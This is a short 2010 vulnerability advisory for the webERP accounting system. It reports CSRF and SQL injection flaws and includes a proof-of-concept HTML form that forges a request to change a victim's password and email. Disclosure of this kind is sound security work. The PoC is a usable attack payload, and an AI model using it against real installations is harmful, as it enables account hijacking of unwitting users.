# Title: webERP Multiple Vulnerabilities# Author: ADEO Security# Published: 30/06/2010# Version: 3.11.4 (Possible all versions)# Vendor: http://www.weberp.org# Description: "webERP is a complete web based accounting/ERP system
that requires only a web-browser and pdf reader to use. It has a wide
range of features suitable for many businesses particularly
distributed businesses in wholesale and distribution. It is developed
as an open-source application andis available as a free download to
use. The feature setis continually expanding as new businesses and
developers adopt it.There are on average 5,000 downloads per month."
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr
# Vulnerabilities:1) CSRF: Attacker can add new administrator to the system. All files
have this issue. See #PoC section.2) SQL Injection: Application offer disable the magic_quotes_gpc.
Attacker can inject sql codes if exploit the CSRF vulnerability. HTTP
Requests must filtered.# PoC (CSRF):<html><body><form method="POST" action="http://server/UserSettings.php?"><inputtype="hidden" name="RealName" VALUE="ADEO-Security"><inputtype='hidden' name='DisplayRecordsMax' VALUE="10"><inputtype='hidden' name='Language' VALUE='en_US'><inputtype='hidden' name='Theme' VALUE='green'><inputtype='hidden' name='pass' value='adeopass'><inputtype='hidden' name='passcheck' value='adeopass'><inputtype='hidden' name='email' size=40 value='hacked@weberp.org'><inputtype='hidden' name='Modify' value="Modify""></div></form></body></html>
